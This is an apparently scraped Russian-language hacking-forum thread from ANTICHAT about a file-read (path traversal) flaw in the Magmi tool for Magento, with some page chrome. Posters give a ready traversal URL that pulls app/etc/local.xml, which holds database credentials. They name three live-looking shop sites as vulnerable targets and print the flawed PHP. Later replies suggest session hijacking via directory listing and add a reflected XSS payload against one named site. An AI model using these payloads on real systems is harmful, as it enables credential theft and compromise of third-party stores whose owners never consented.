ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
17.02.2015, 21:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Локальня читалка Magento:
http://localhost/magmi/web/download_file.php?file=../../app/etc/local.xml
Пример уязвимых урлов:
Сообщение от None
_http://bentextiles.com/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://mengotti-online.com/shop/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://www.lowellcraft.com/magmi/web/download_file.php?file=../../app/etc/local.xml
Уязвимый код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=@[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]error_get_last[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])
{
@[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]);
}
if([/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]// Extract the type of file which will be sent to the browser as a header
[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filetype[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// Get a date and timestamp
[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"F j, Y, g:i a"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]// Send file headers
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-type:[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-Disposition: attachment;filename="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-Transfer-Encoding: binary"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: no-cache'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// Send the file contents.
[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
}
else
{
[/COLOR][COLOR="#0000BB"]print_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
P.S: В гугле по этой баге ничего не нашел.
P.S:
Обнаружил случайно в пакете с обновлением фикса баги
_http://www.exploit-db.com/exploits/35052/
сам фикс с багой, читалкой на гитхабе
https://github.com/dweeves/magmi-git Magento CE 1.8.x & 1.9.x |
|
|
18.05.2015, 21:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Хм, Magento на FreeBSD, возможно, можно сразу скомпроментировать, так как при чтении директории(это тоже файл!) можно получить список файлов. Сессия по умолчанию пишется в файловую си-му в install-dir/var/session обычно, в БД редко(в Wizard установщике по дефолту файловая си-ма )
|
|
|
|
06.09.2015, 14:53
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Может пора спустить в паблик?
|
|
|
|
06.09.2015, 16:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Не стоит
|
|
|
|
07.09.2015, 11:26
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
В целом, стоит - не стоит, решать автору
|
|
|
|
07.09.2015, 11:42
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
спускай, а на гитхабе сделаем ссылку на пост)) пускай фиксят, бага все равно мало полезная...
P.S:Пасивная XSS
http://www.lowellcraft.com/magmi/web/ajax_gettime.php
POSTrefix=alert('xss')
magmi/web/ajax_gettime.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
При GET запросе на примерной площадке сробатывает мод секьюрети |
|
|
|
06.01.2016, 16:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
|
|
|
|
06.01.2016, 19:11
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902
Репутация:
0
|
|
|
|
|
|
06.01.2016, 20:54
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Да, только там при правильном подходе идет выполнения php кода, а тут просто читалка
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
